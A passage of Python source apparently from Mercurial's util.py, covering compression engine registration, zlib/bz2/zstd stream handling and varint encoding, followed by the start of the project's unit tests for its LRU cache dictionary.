            if base in dirs:
                dirs[base] += 1
                return
            dirs[base] = 1

    def delpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if dirs[base] > 1:
                dirs[base] -= 1
                return
            del dirs[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs

if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs

def finddirs(path):
    pos = path.rfind('/')
    while pos != -1:
        yield path[:pos]
        pos = path.rfind('/', 0, pos)
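
# Example (exposition only; not upstream code): finddirs() yields the
# ancestors of a path from the deepest directory up, excluding the path
# itself and the repository root.
def _examplefinddirs():
    return list(finddirs('a/b/c/d.txt'))    # ['a/b/c', 'a/b', 'a']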

# compression code

SERVERROLE = 'server'
CLIENTROLE = 'client'

compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))

class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # No external facing name declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()

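# Lookup sketch (exposition only; not upstream code): typical queries against
# the global registry. The engines referenced here are registered further
# down in this module.
def _examplecompenginelookup():
    byname = compengines['zlib']                    # direct name lookup
    byspec = compengines.forbundlename('gzip')      # bundle spec name -> zlib
    bytype = compengines.forbundletype('BZ')        # internal id -> bz2
    order = [e.name() for e in
             compengines.supportedwireengines(SERVERROLE)]
    return byname, byspec, bytype, order
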
class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of chunks of bytes representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()

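# Sketch of a minimal bundle-capable engine (exposition only; hypothetical
# and never registered): an identity "compressor" implementing the smallest
# surface the interface above requires for bundles.
class _exampleidentityengine(compressionengine):
    def name(self):
        return 'example-identity'

    def bundletype(self):
        """Hypothetical engine that stores chunks unmodified."""
        # First element None keeps it out of user-facing bundle specs.
        return None, '_EXAMPLEID'

    def compressstream(self, it, opts=None):
        return it    # identity: pass chunks through untouched

    def decompressorreader(self, fh):
        return fh    # the raw file object already yields the payload
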
class _CompressedStreamReader(object):
    def __init__(self, fh):
        if safehasattr(fh, 'unbufferedread'):
            self._reader = fh.unbufferedread
        else:
            self._reader = fh.read
        self._pending = []
        self._pos = 0
        self._eof = False

    def _decompress(self, chunk):
        raise NotImplementedError()

    def read(self, l):
        buf = []
        while True:
            while self._pending:
                if len(self._pending[0]) > l + self._pos:
                    newbuf = self._pending[0]
                    buf.append(newbuf[self._pos:self._pos + l])
                    self._pos += l
                    return ''.join(buf)

                newbuf = self._pending.pop(0)
                if self._pos:
                    buf.append(newbuf[self._pos:])
                    l -= len(newbuf) - self._pos
                else:
                    buf.append(newbuf)
                    l -= len(newbuf)
                self._pos = 0

            if self._eof:
                return ''.join(buf)
            chunk = self._reader(65536)
            self._decompress(chunk)
            if not chunk and not self._pending and not self._eof:
                # No progress and no new data, bail out
                return ''.join(buf)

class _GzipCompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh):
        super(_GzipCompressedStreamReader, self).__init__(fh)
        self._decompobj = zlib.decompressobj()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
        d = self._decompobj.copy()
        try:
            d.decompress('x')
            d.flush()
            if d.unused_data == 'x':
                self._eof = True
        except zlib.error:
            pass

class _BZ2CompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh):
        super(_BZ2CompressedStreamReader, self).__init__(fh)
        self._decompobj = bz2.BZ2Decompressor()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
        try:
            while True:
                newbuf = self._decompobj.decompress('')
                if newbuf:
                    self._pending.append(newbuf)
                else:
                    break
        except EOFError:
            self._eof = True

class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
    def __init__(self, fh):
        super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
        newbuf = self._decompobj.decompress('BZ')
        if newbuf:
            self._pending.append(newbuf)

class _ZstdCompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh, zstd):
        super(_ZstdCompressedStreamReader, self).__init__(fh)
        self._zstd = zstd
        self._decompobj = zstd.ZstdDecompressor().decompressobj()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
        try:
            while True:
                newbuf = self._decompobj.decompress('')
                if newbuf:
                    self._pending.append(newbuf)
                else:
                    break
        except self._zstd.ZstdError:
            self._eof = True

class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and size.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        return _GzipCompressedStreamReader(fh)

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())

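# Round-trip sketch (exposition only; not upstream code): compressstream()
# consumes an iterator of chunks, and decompressorreader() wraps any object
# with a read() method, per the compressionengine contract above.
def _examplezlibroundtrip():
    engine = compengines['zlib']
    packed = b''.join(engine.compressstream([b'some ', b'payload']))
    reader = engine.decompressorreader(bytesio(packed))
    return reader.read(12)    # -> b'some payload'
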
class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        return _BZ2CompressedStreamReader(fh)

compengines.register(_bz2engine())

class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        return _TruncatedBZ2CompressedStreamReader(fh)

compengines.register(_truncatedbz2engine())

class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        return it

    def decompressorreader(self, fh):
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())

class _zstdengine(compressionengine):
    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        return _ZstdCompressedStreamReader(fh, self._module)

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # TODO consider omitting frame magic to save 4 bytes.
            # This writes content sizes into the frame header. That is
            # extra storage. But it allows a correct size memory allocation
            # to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                return None

            elif insize <= 1000000:
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())
3850
3850
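# Usage sketch (not part of util.py): how a caller might exercise this
# engine through the APIs defined above. The data values are hypothetical;
# the guard on available() matters because not all installs bundle the
# optional zstd module.
def _zstd_engine_demo():
    engine = compengines['zstd']
    if not engine.available():
        return  # this install has no bundled zstd module

    # Streaming compression: feed an iterator of byte chunks, receive
    # compressed chunks back.
    compressed_chunks = list(engine.compressstream(iter([b'some ', b'data'])))
    assert compressed_chunks

    # Round-trip through the revlog compressor. compress() may return None,
    # which means "store uncompressed" (input too small or incompressible).
    c = engine.revlogcompressor({'level': 3})
    blob = b'x' * 1000
    compressed = c.compress(blob)
    if compressed is not None:
        assert c.decompress(compressed) == blob
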
def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bt = engine.bundletype()
        if not bt or not bt[0]:
            continue

        doc = pycompat.sysstr('``%s``\n    %s') % (
            bt[0], engine.bundletype.__doc__)

        value = docobject()
        value.__doc__ = doc
        value._origdoc = engine.bundletype.__doc__
        value._origfunc = engine.bundletype

        items[bt[0]] = value

    return items

i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace

def safename(f, tag, ctx, others=None):
    """
    Generate a name that is safe to rename f to in the given context.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    fn = '%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    for n in itertools.count(1):
        fn = '%s~%s~%s' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn

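# Usage sketch (not part of util.py): membership testing is all safename()
# needs from ``ctx``, so a plain set can stand in for a changectx here. The
# file names are hypothetical.
def _safename_demo():
    existing = {'foo', 'foo~base', 'foo~base~1'}
    assert safename('foo', 'base', existing) == 'foo~base~2'
    assert safename('bar', 'base', existing) == 'bar~base'
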
def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    s = stream.read(n)
    if len(s) < n:
        raise error.Abort(_("stream ended unexpectedly"
                            " (got %d bytes, expected %d)")
                          % (len(s), n))
    return s

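# Usage sketch (not part of util.py): readexactly() turns a short read into
# a hard error instead of silently returning fewer bytes than requested.
def _readexactly_demo():
    from io import BytesIO
    assert readexactly(BytesIO(b'abcdef'), 4) == b'abcd'
    try:
        readexactly(BytesIO(b'ab'), 4)
    except error.Abort:
        pass  # "stream ended unexpectedly (got 2 bytes, expected 4)"
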
def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the integer's binary value, least significant group
    first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
    bits = value & 0x7f
    value >>= 7
    bytes = []
    while value:
        bytes.append(pycompat.bytechr(0x80 | bits))
        bits = value & 0x7f
        value >>= 7
    bytes.append(pycompat.bytechr(bits))

    return ''.join(bytes)

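# Worked example for the doctests above: 1337 is 0b10100111001. Split into
# 7-bit groups from the least significant end: 0111001 (57) and 0001010
# (10). The first byte carries the continuation bit, 0x80 | 57 = 0xb9; the
# final byte is 10 = 0x0a, i.e. '\n'. Hence uvarintencode(1337) == '\xb9\n'.
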
def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    result = 0
    shift = 0
    while True:
        byte = ord(readexactly(fh, 1))
        result |= ((byte & 0x7f) << shift)
        if not (byte & 0x80):
            return result
        shift += 7
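
# Round-trip sketch (not part of util.py): the two functions above are
# inverses for any non-negative integer. BytesIO supplies the ``.read(N)``
# interface uvarintdecodestream() expects.
def _uvarint_roundtrip_demo():
    from io import BytesIO
    for value in (0, 1, 127, 128, 1337, 65536, 2 ** 64):
        encoded = uvarintencode(value)
        assert uvarintdecodestream(BytesIO(encoded)) == value
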
@@ -1,325 +1,337 @@ tests/test-lrucachedict.py
from __future__ import absolute_import, print_function

import unittest

import silenttestrunner

from mercurial import (
    util,
)

class testlrucachedict(unittest.TestCase):
    def testsimple(self):
        d = util.lrucachedict(4)
        self.assertEqual(d.capacity, 4)
        d.insert('a', 'va', cost=2)
        d['b'] = 'vb'
        d['c'] = 'vc'
        d.insert('d', 'vd', cost=42)

        self.assertEqual(d['a'], 'va')
        self.assertEqual(d['b'], 'vb')
        self.assertEqual(d['c'], 'vc')
        self.assertEqual(d['d'], 'vd')

        self.assertEqual(d.totalcost, 44)

        # 'a' should be dropped because it was least recently used.
        d['e'] = 've'
        self.assertNotIn('a', d)
        self.assertIsNone(d.get('a'))
        self.assertEqual(d.totalcost, 42)

        self.assertEqual(d['b'], 'vb')
        self.assertEqual(d['c'], 'vc')
        self.assertEqual(d['d'], 'vd')
        self.assertEqual(d['e'], 've')

        # Replacing item with different cost adjusts totalcost.
        d.insert('e', 've', cost=4)
        self.assertEqual(d.totalcost, 46)

        # Touch entries in some order (both get and set).
        d['e']
        d['c'] = 'vc2'
        d['d']
        d['b'] = 'vb2'

        # 'e' should be dropped now
        d['f'] = 'vf'
        self.assertNotIn('e', d)
        self.assertEqual(d['b'], 'vb2')
        self.assertEqual(d['c'], 'vc2')
        self.assertEqual(d['d'], 'vd')
        self.assertEqual(d['f'], 'vf')

        d.clear()
        for key in ('a', 'b', 'c', 'd', 'e', 'f'):
            self.assertNotIn(key, d)

    def testunfull(self):
        d = util.lrucachedict(4)
        d['a'] = 1
        d['b'] = 2
        d['a']
        d['b']

        for key in ('a', 'b'):
            self.assertIn(key, d)

    def testget(self):
        d = util.lrucachedict(4)
        d['a'] = 'va'
        d['b'] = 'vb'
        d['c'] = 'vc'

        self.assertIsNone(d.get('missing'))
        self.assertEqual(list(d), ['c', 'b', 'a'])

        self.assertEqual(d.get('a'), 'va')
        self.assertEqual(list(d), ['a', 'c', 'b'])

    def testcopypartial(self):
        d = util.lrucachedict(4)
        d.insert('a', 'va', cost=4)
        d.insert('b', 'vb', cost=2)

        dc = d.copy()

        self.assertEqual(len(dc), 2)
        self.assertEqual(dc.totalcost, 6)
        for key in ('a', 'b'):
            self.assertIn(key, dc)
            self.assertEqual(dc[key], 'v%s' % key)

        self.assertEqual(len(d), 2)
        for key in ('a', 'b'):
            self.assertIn(key, d)
            self.assertEqual(d[key], 'v%s' % key)

        d['c'] = 'vc'
        del d['b']
        self.assertEqual(d.totalcost, 4)
        dc = d.copy()
        self.assertEqual(len(dc), 2)
        self.assertEqual(dc.totalcost, 4)
        for key in ('a', 'c'):
            self.assertIn(key, dc)
            self.assertEqual(dc[key], 'v%s' % key)

    def testcopyempty(self):
        d = util.lrucachedict(4)
        dc = d.copy()
        self.assertEqual(len(dc), 0)

    def testcopyfull(self):
        d = util.lrucachedict(4)
        d.insert('a', 'va', cost=42)
        d['b'] = 'vb'
        d['c'] = 'vc'
        d['d'] = 'vd'

        dc = d.copy()

        for key in ('a', 'b', 'c', 'd'):
            self.assertIn(key, dc)
            self.assertEqual(dc[key], 'v%s' % key)

        self.assertEqual(d.totalcost, 42)
        self.assertEqual(dc.totalcost, 42)

        # 'a' should be dropped because it was least recently used.
        dc['e'] = 've'
        self.assertNotIn('a', dc)
        for key in ('b', 'c', 'd', 'e'):
            self.assertIn(key, dc)
            self.assertEqual(dc[key], 'v%s' % key)

        self.assertEqual(d.totalcost, 42)
        self.assertEqual(dc.totalcost, 0)

        # Contents and order of original dict should remain unchanged.
        dc['b'] = 'vb_new'

        self.assertEqual(list(iter(d)), ['d', 'c', 'b', 'a'])
        for key in ('a', 'b', 'c', 'd'):
            self.assertEqual(d[key], 'v%s' % key)

        d = util.lrucachedict(4, maxcost=42)
        d.insert('a', 'va', cost=5)
        d.insert('b', 'vb', cost=4)
        d.insert('c', 'vc', cost=3)
        dc = d.copy()
        self.assertEqual(dc.maxcost, 42)
        self.assertEqual(len(dc), 3)

        # Max cost can be lowered as part of copy.
        dc = d.copy(maxcost=10)
        self.assertEqual(dc.maxcost, 10)
        self.assertEqual(len(dc), 2)
        self.assertEqual(dc.totalcost, 7)
        self.assertIn('b', dc)
        self.assertIn('c', dc)

    def testcopydecreasecapacity(self):
        d = util.lrucachedict(5)
        d.insert('a', 'va', cost=4)
        d.insert('b', 'vb', cost=2)
        d['c'] = 'vc'
        d['d'] = 'vd'

        dc = d.copy(2)
        self.assertEqual(dc.totalcost, 0)
        for key in ('a', 'b'):
            self.assertNotIn(key, dc)
        for key in ('c', 'd'):
            self.assertIn(key, dc)
            self.assertEqual(dc[key], 'v%s' % key)

        dc.insert('e', 've', cost=7)
        self.assertEqual(dc.totalcost, 7)
        self.assertNotIn('c', dc)
        for key in ('d', 'e'):
            self.assertIn(key, dc)
            self.assertEqual(dc[key], 'v%s' % key)

        # Original should remain unchanged.
        self.assertEqual(d.totalcost, 6)
        for key in ('a', 'b', 'c', 'd'):
            self.assertIn(key, d)
            self.assertEqual(d[key], 'v%s' % key)

    def testcopyincreasecapacity(self):
        d = util.lrucachedict(5)
        d['a'] = 'va'
        d['b'] = 'vb'
        d['c'] = 'vc'
        d['d'] = 'vd'

        dc = d.copy(6)
        for key in ('a', 'b', 'c', 'd'):
            self.assertIn(key, dc)
            self.assertEqual(dc[key], 'v%s' % key)

        dc['e'] = 've'
        dc['f'] = 'vf'
        for key in ('a', 'b', 'c', 'd', 'e', 'f'):
            self.assertIn(key, dc)
            self.assertEqual(dc[key], 'v%s' % key)

        dc['g'] = 'vg'
        self.assertNotIn('a', dc)
        for key in ('b', 'c', 'd', 'e', 'f', 'g'):
            self.assertIn(key, dc)
            self.assertEqual(dc[key], 'v%s' % key)

        # Original should remain unchanged.
        for key in ('a', 'b', 'c', 'd'):
            self.assertIn(key, d)
            self.assertEqual(d[key], 'v%s' % key)

    def testpopoldest(self):
        d = util.lrucachedict(4)
        d.insert('a', 'va', cost=10)
        d.insert('b', 'vb', cost=5)

        self.assertEqual(len(d), 2)
        self.assertEqual(d.popoldest(), ('a', 'va'))
        self.assertEqual(len(d), 1)
        self.assertEqual(d.totalcost, 5)
        self.assertEqual(d.popoldest(), ('b', 'vb'))
        self.assertEqual(len(d), 0)
        self.assertEqual(d.totalcost, 0)
        self.assertIsNone(d.popoldest())

        d['a'] = 'va'
        d['b'] = 'vb'
        d['c'] = 'vc'
        d['d'] = 'vd'

        self.assertEqual(d.popoldest(), ('a', 'va'))
        self.assertEqual(len(d), 3)
        for key in ('b', 'c', 'd'):
            self.assertEqual(d[key], 'v%s' % key)

        d['a'] = 'va'
        self.assertEqual(d.popoldest(), ('b', 'vb'))

    def testmaxcost(self):
        # Item cost is zero by default.
        d = util.lrucachedict(6, maxcost=10)
        d['a'] = 'va'
        d['b'] = 'vb'
        d['c'] = 'vc'
        d['d'] = 'vd'
        self.assertEqual(len(d), 4)
        self.assertEqual(d.totalcost, 0)

        d.clear()

        # Insertion to exact cost threshold works without eviction.
        d.insert('a', 'va', cost=6)
        d.insert('b', 'vb', cost=4)

        self.assertEqual(len(d), 2)
        self.assertEqual(d['a'], 'va')
        self.assertEqual(d['b'], 'vb')

        # Inserting a new element with 0 cost works.
        d['c'] = 'vc'
        self.assertEqual(len(d), 3)

        # Inserting a new element with cost putting us above high
        # water mark evicts oldest single item.
        d.insert('d', 'vd', cost=1)
        self.assertEqual(len(d), 3)
        self.assertEqual(d.totalcost, 5)
        self.assertNotIn('a', d)
        for key in ('b', 'c', 'd'):
            self.assertEqual(d[key], 'v%s' % key)

        # Inserting a new element with enough room for just itself
        # evicts all items before.
        d.insert('e', 've', cost=10)
        self.assertEqual(len(d), 1)
        self.assertEqual(d.totalcost, 10)
        self.assertIn('e', d)

        # Inserting a new element with cost greater than threshold
        # still retains that item.
        d.insert('f', 'vf', cost=11)
        self.assertEqual(len(d), 1)
